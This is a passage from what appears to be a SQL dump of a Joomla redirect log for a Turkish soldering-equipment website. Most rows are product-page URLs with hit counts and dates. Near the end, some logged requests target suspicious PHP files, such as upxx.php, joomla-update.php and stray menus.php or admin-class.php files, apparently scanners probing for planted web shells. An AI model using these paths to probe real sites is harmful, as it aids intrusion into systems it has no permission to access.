00:00:00',301),(14386,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-40',NULL,'','',3,0,'2017-11-28 10:13:59','0000-00-00 00:00:00',301),(14387,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',1,0,'2017-11-28 10:14:45','0000-00-00 00:00:00',301),(14388,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',1,0,'2017-11-28 10:14:53','0000-00-00 00:00:00',301),(14389,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',1,0,'2017-11-28 10:15:10','0000-00-00 00:00:00',301),(14390,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,mf_name?language=en-gb',NULL,'','',17,0,'2017-11-28 10:24:25','0000-00-00 00:00:00',301),(14391,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',242,0,'2017-11-28 10:24:48','0000-00-00 00:00:00',301),(14392,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-20',NULL,'','',6,0,'2017-11-28 10:30:43','0000-00-00 00:00:00',301),(14393,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-11-28 10:35:41','0000-00-00 00:00:00',301),(14394,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/dirdesc?language=en-gb',NULL,'','',11,0,'2017-11-28 10:47:12','0000-00-00 00:00:00',301),(14395,'http://3s-technologies.com.tr/tr/modules/attributewizardpro/file_upload.php',NULL,'','',1,0,'2017-11-28 10:50:06','0000-00-00 00:00:00',301),(14396,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&itemid=140&lang=tr',NULL,'','',6,0,'2017-11-28 10:55:50','0000-00-00 00:00:00',301),(14397,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-11-28 11:21:49','0000-00-00 00:00:00',301),(14398,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/spr-20-detail',NULL,'','',1,0,'2017-11-28 11:24:46','0000-00-00 00:00:00',301),(14399,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name?language=en-gb',NULL,'','',25,0,'2017-11-28 11:29:08','0000-00-00 00:00:00',301),(14400,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-40',NULL,'','',4,0,'2017-11-28 11:40:16','0000-00-00 00:00:00',301),(14401,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',4,0,'2017-11-28 11:46:59','0000-00-00 00:00:00',301),(14402,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',18,0,'2017-11-28 11:52:35','0000-00-00 00:00:00',301),(14403,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',7,0,'2017-11-28 12:01:44','0000-00-00 00:00:00',301),(14404,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering/results,1-20',NULL,'','',1,0,'2017-11-28 12:26:25','0000-00-00 00:00:00',301),(14405,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,mf_name?language=tr-tr',NULL,'','',24,0,'2017-11-28 12:32:17','0000-00-00 00:00:00',301),(14406,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-100',NULL,'','',4,0,'2017-11-28 12:35:39','0000-00-00 00:00:00',301),(14407,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',28,0,'2017-11-28 12:41:31','0000-00-00 00:00:00',301),(14408,'http://www.3s-technologies.com.tr/index.php/en/products/275-k100-1.2mm-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-28 12:42:23','0000-00-00 00:00:00',301),(14409,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',14,0,'2017-11-28 12:55:55','0000-00-00 00:00:00',301),(14410,'http://3s-technologies.com.tr/index.php/en/products/am100-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-28 13:06:31','0000-00-00 00:00:00',301),(14411,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-10',NULL,'','',3,0,'2017-11-28 13:06:55','0000-00-00 00:00:00',301),(14412,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',590,0,'2017-11-28 13:08:57','0000-00-00 00:00:00',301),(14413,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',610,0,'2017-11-28 13:08:59','0000-00-00 00:00:00',301),(14414,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',574,0,'2017-11-28 13:09:07','0000-00-00 00:00:00',301),(14415,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-100',NULL,'','',4,0,'2017-11-28 13:17:14','0000-00-00 00:00:00',301),(14416,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-11-28 13:20:47','0000-00-00 00:00:00',301),(14417,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,category_name?language=en-gb',NULL,'','',11,0,'2017-11-28 13:35:07','0000-00-00 00:00:00',301),(14418,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar',NULL,'','',1,0,'2017-11-28 13:53:55','0000-00-00 00:00:00',301),(14419,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',397,0,'2017-11-28 14:24:57','0000-00-00 00:00:00',301),(14420,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&type=atom&lang=en',NULL,'','',93,0,'2017-11-28 14:52:58','0000-00-00 00:00:00',301),(14421,'http://3s-technologies.com.tr/index.php/tr/ueruenler/rh2-20-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-28 14:58:48','0000-00-00 00:00:00',301),(14422,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/aqueous',NULL,'','',6,0,'2017-11-28 15:23:38','0000-00-00 00:00:00',301),(14423,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name?language=tr-tr',NULL,'','',28,0,'2017-11-28 15:40:48','0000-00-00 00:00:00',301),(14424,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/mx200lp-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-28 15:44:38','0000-00-00 00:00:00',301),(14425,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-28 15:49:15','0000-00-00 00:00:00',301),(14426,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',204,0,'2017-11-28 16:11:30','0000-00-00 00:00:00',301),(14427,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',536,0,'2017-11-28 16:30:15','0000-00-00 00:00:00',301),(14428,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',228,0,'2017-11-28 16:46:26','0000-00-00 00:00:00',301),(14429,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',210,0,'2017-11-28 16:46:52','0000-00-00 00:00:00',301),(14430,'http://www.3s-technologies.com.tr/index.php/en/products/955lc-detail?tmpl=component&print=1',NULL,'','',28,0,'2017-11-28 16:52:33','0000-00-00 00:00:00',301),(14431,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/dirdesc',NULL,'','',2,0,'2017-11-28 16:59:04','0000-00-00 00:00:00',301),(14432,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-11-28 17:12:41','0000-00-00 00:00:00',301),(14433,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-28 17:16:06','0000-00-00 00:00:00',301),(14434,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim-31-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-28 17:19:02','0000-00-00 00:00:00',301),(14435,'http://www.3s-technologies.com.tr/tr/images/urunler/kester_flux.png',NULL,'','',1,0,'2017-11-28 17:45:09','0000-00-00 00:00:00',301),(14436,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-28 17:46:22','0000-00-00 00:00:00',301),(14437,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',24,0,'2017-11-28 17:47:40','0000-00-00 00:00:00',301),(14438,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-28 18:32:53','0000-00-00 00:00:00',301),(14439,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-28 19:36:19','0000-00-00 00:00:00',301),(14440,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-28 19:57:51','0000-00-00 00:00:00',301),(14441,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,category_name/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-28 20:07:00','0000-00-00 00:00:00',301),(14442,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-28 20:07:42','0000-00-00 00:00:00',301),(14443,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız',NULL,'','',362,0,'2017-11-28 20:50:10','0000-00-00 00:00:00',301),(14444,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer',NULL,'','',26,0,'2017-11-28 20:52:20','0000-00-00 00:00:00',301),(14445,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',27,0,'2017-11-28 21:06:11','0000-00-00 00:00:00',301),(14446,'http://3s-technologies.com.tr/index.php/tr/ueruenler/cm-602-l-detail?tmpl=component&print=1',NULL,'','',13,0,'2017-11-28 21:14:21','0000-00-00 00:00:00',301),(14447,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-28 21:32:56','0000-00-00 00:00:00',301),(14448,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,category_name/dirdesc',NULL,'','',8,0,'2017-11-28 21:34:17','0000-00-00 00:00:00',301),(14449,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',400,0,'2017-11-28 21:40:43','0000-00-00 00:00:00',301),(14450,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering/results,1-40',NULL,'','',1,0,'2017-11-28 21:51:21','0000-00-00 00:00:00',301),(14451,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,ordering?language=en-gb',NULL,'','',25,0,'2017-11-28 22:00:52','0000-00-00 00:00:00',301),(14452,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-28 22:01:00','0000-00-00 00:00:00',301),(14453,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-28 22:09:19','0000-00-00 00:00:00',301),(14454,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',5,0,'2017-11-28 22:13:23','0000-00-00 00:00:00',301),(14455,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',400,0,'2017-11-28 22:15:05','0000-00-00 00:00:00',301),(14456,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-20',NULL,'','',4,0,'2017-11-28 22:19:03','0000-00-00 00:00:00',301),(14457,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-28 22:19:34','0000-00-00 00:00:00',301),(14458,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?language=en-gb',NULL,'','',9,0,'2017-11-28 22:32:44','0000-00-00 00:00:00',301),(14459,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering/results,1-100',NULL,'','',3,0,'2017-11-28 22:34:57','0000-00-00 00:00:00',301),(14460,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-100',NULL,'','',3,0,'2017-11-29 00:15:24','0000-00-00 00:00:00',301),(14461,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5',NULL,'','',6,0,'2017-11-29 00:23:46','0000-00-00 00:00:00',301),(14462,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',49,0,'2017-11-29 00:24:22','0000-00-00 00:00:00',301),(14463,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-29 00:40:54','0000-00-00 00:00:00',301),(14464,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',209,0,'2017-11-29 00:45:40','0000-00-00 00:00:00',301),(14465,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2017-11-29 00:48:54','0000-00-00 00:00:00',301),(14466,'http://3s-technologies.com.tr/en/products/2.-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-11-29 00:49:38','0000-00-00 00:00:00',301),(14467,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name',NULL,'','',230,0,'2017-11-29 01:05:40','0000-00-00 00:00:00',301),(14468,'http://3s-technologies.com.tr/index.php/tr/ueruenler/spr-20-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-29 01:07:02','0000-00-00 00:00:00',301),(14469,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/av132-detail',NULL,'','',7,0,'2017-11-29 01:29:39','0000-00-00 00:00:00',301),(14470,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc',NULL,'','',5,0,'2017-11-29 01:30:47','0000-00-00 00:00:00',301),(14471,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-29 01:38:15','0000-00-00 00:00:00',301),(14472,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-detail',NULL,'','',15,0,'2017-11-29 01:40:01','0000-00-00 00:00:00',301),(14473,'http://3s-technologies.com.tr/en/products/krem-lehim-31-32-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-29 01:46:08','0000-00-00 00:00:00',301),(14474,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/dirdesc',NULL,'','',6,0,'2017-11-29 02:04:16','0000-00-00 00:00:00',301),(14475,'http://www.3s-technologies.com.tr/index.php/en/products/ls60v-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-29 02:06:49','0000-00-00 00:00:00',301),(14476,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hä±z/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-29 02:09:55','0000-00-00 00:00:00',301),(14477,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/index_01_250x250.jpg',NULL,'','',2,0,'2017-11-29 02:18:03','0000-00-00 00:00:00',301),(14478,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-29 02:29:20','0000-00-00 00:00:00',301),(14479,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-29 02:38:59','0000-00-00 00:00:00',301),(14480,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-29 02:44:04','0000-00-00 00:00:00',301),(14481,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-42-detail',NULL,'','',36,0,'2017-11-29 02:48:55','0000-00-00 00:00:00',301),(14482,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/mi-300-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-29 02:52:36','0000-00-00 00:00:00',301),(14483,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20',NULL,'','',3,0,'2017-11-29 02:54:27','0000-00-00 00:00:00',301),(14484,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,ordering?language=en-gb',NULL,'','',7,0,'2017-11-29 02:57:09','0000-00-00 00:00:00',301),(14485,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/results,1-40',NULL,'','',5,0,'2017-11-29 03:02:50','0000-00-00 00:00:00',301),(14486,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-20',NULL,'','',3,0,'2017-11-29 03:11:11','0000-00-00 00:00:00',301),(14487,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-29 03:28:06','0000-00-00 00:00:00',301),(14488,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-33-34-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-29 03:55:12','0000-00-00 00:00:00',301),(14489,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/mi-300-detail',NULL,'','',14,0,'2017-11-29 04:13:04','0000-00-00 00:00:00',301),(14490,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/dirdesc/results,1-10',NULL,'','',10,0,'2017-11-29 04:18:10','0000-00-00 00:00:00',301),(14491,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,product_name?language=tr-tr',NULL,'','',25,0,'2017-11-29 04:23:50','0000-00-00 00:00:00',301),(14492,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-29 04:24:30','0000-00-00 00:00:00',301),(14493,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-29 04:27:51','0000-00-00 00:00:00',301),(14494,'http://3s-technologies.com.tr/en/products/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-29 05:04:45','0000-00-00 00:00:00',301),(14495,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer?language=en-gb',NULL,'','',1,0,'2017-11-29 05:06:31','0000-00-00 00:00:00',301),(14496,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10',NULL,'','',1,0,'2017-11-29 05:08:24','0000-00-00 00:00:00',301),(14497,'http://www.3s-technologies.com.tr/en/products/avf-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-29 05:15:18','0000-00-00 00:00:00',301),(14498,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',3,0,'2017-11-29 05:16:46','0000-00-00 00:00:00',301),(14499,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',35,0,'2017-11-29 05:20:27','0000-00-00 00:00:00',301),(14500,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-29 05:22:23','0000-00-00 00:00:00',301),(14501,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-detail',NULL,'','',32,0,'2017-11-29 05:30:30','0000-00-00 00:00:00',301),(14502,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,`p`.product_sku?language=en-gb',NULL,'','',25,0,'2017-11-29 05:43:30','0000-00-00 00:00:00',301),(14503,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-detail',NULL,'','',15,0,'2017-11-29 05:52:06','0000-00-00 00:00:00',301),(14504,'http://3s-technologies.com.tr/index.php/tr/ueruenler/konveyorler',NULL,'','',19,0,'2017-11-29 06:27:03','0000-00-00 00:00:00',301),(14505,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name/results,1-5',NULL,'','',3,0,'2017-11-29 06:40:30','0000-00-00 00:00:00',301),(14506,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-29 06:51:02','0000-00-00 00:00:00',301),(14507,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',37,0,'2017-11-29 06:59:26','0000-00-00 00:00:00',301),(14508,'http://3s-technologies.com.tr/en/plugins/content/apismtp/apismtp.php?test=hello',NULL,'3s-technologies.com.tr','',5,0,'2017-11-29 07:12:03','0000-00-00 00:00:00',301),(14509,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',18,0,'2017-11-29 07:12:31','0000-00-00 00:00:00',301),(14510,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-50',NULL,'','',4,0,'2017-11-29 07:13:58','0000-00-00 00:00:00',301),(14511,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-29 07:18:59','0000-00-00 00:00:00',301),(14512,'http://3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/english-content',NULL,'','',20,0,'2017-11-29 07:19:31','0000-00-00 00:00:00',301),(14513,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-11-29 07:22:21','0000-00-00 00:00:00',301),(14514,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-29 07:23:51','0000-00-00 00:00:00',301),(14515,'https://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-29 07:28:43','0000-00-00 00:00:00',301),(14516,'http://3s-technologies.com.tr/en/tmp/upxx.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 07:30:13','0000-00-00 00:00:00',301),(14517,'http://3s-technologies.com.tr/en/upxx.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 07:30:38','0000-00-00 00:00:00',301),(14518,'http://3s-technologies.com.tr/en/products/dalga-lehim/dirdesc',NULL,'','',7,0,'2017-11-29 07:33:02','0000-00-00 00:00:00',301),(14519,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-29 07:34:59','0000-00-00 00:00:00',301),(14520,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/am100-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-29 07:46:59','0000-00-00 00:00:00',301),(14521,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_fl_250x250.png',NULL,'','',2,0,'2017-11-29 08:04:53','0000-00-00 00:00:00',301),(14522,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,category_name?language=tr-tr',NULL,'','',31,0,'2017-11-29 08:21:07','0000-00-00 00:00:00',301),(14523,'http://3s-technologies.com.tr/en/products/lfs-1-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-29 08:27:16','0000-00-00 00:00:00',301),(14524,'http://3s-technologies.com.tr/index.php/en/products/avb-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-29 08:45:18','0000-00-00 00:00:00',301),(14525,'http://3s-technologies.com.tr/index.php/en/products/spr-20-41-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-29 08:46:47','0000-00-00 00:00:00',301),(14526,'http://3s-technologies.com.tr/en/media/joomla-update.php',NULL,'3s-technologies.com.tr','',3,0,'2017-11-29 08:47:07','0000-00-00 00:00:00',301),(14527,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-29 08:49:31','0000-00-00 00:00:00',301),(14528,'http://3s-technologies.com.tr/en/templates/khepri/html/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:51:24','0000-00-00 00:00:00',301),(14529,'http://3s-technologies.com.tr/en/plugins/paste/langs/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:51:28','0000-00-00 00:00:00',301),(14530,'http://3s-technologies.com.tr/en/templates/hathor/html/layouts/com_modules/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:51:29','0000-00-00 00:00:00',301),(14531,'http://3s-technologies.com.tr/en/libraries/joomla/document/feed/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:51:34','0000-00-00 00:00:00',301),(14532,'http://3s-technologies.com.tr/en/libraries/joomla/environment/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:51:48','0000-00-00 00:00:00',301),(14533,'http://3s-technologies.com.tr/en/libraries/cms/helper/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:51:56','0000-00-00 00:00:00',301),(14534,'http://3s-technologies.com.tr/en/administrator/modules/mod_quickicon/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:22','0000-00-00 00:00:00',301),(14535,'http://3s-technologies.com.tr/en/components/com_banners/views/banner/tmpl/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:24','0000-00-00 00:00:00',301),(14536,'http://3s-technologies.com.tr/en/templates/system/images/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:33','0000-00-00 00:00:00',301),(14537,'http://3s-technologies.com.tr/en/components/com_user/views/remind/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:34','0000-00-00 00:00:00',301),(14538,'http://3s-technologies.com.tr/en/components/com_virtuemart/js/extjs/images/default/qtip/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:37','0000-00-00 00:00:00',301),(14539,'http://3s-technologies.com.tr/en/plugins/editors/xstandard/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:48','0000-00-00 00:00:00',301),(14540,'http://3s-technologies.com.tr/en/modules/mod_roknewspager/lib/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:52:54','0000-00-00 00:00:00',301),(14541,'http://3s-technologies.com.tr/en/components/com_mailto/views/sent/tmpl/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:08','0000-00-00 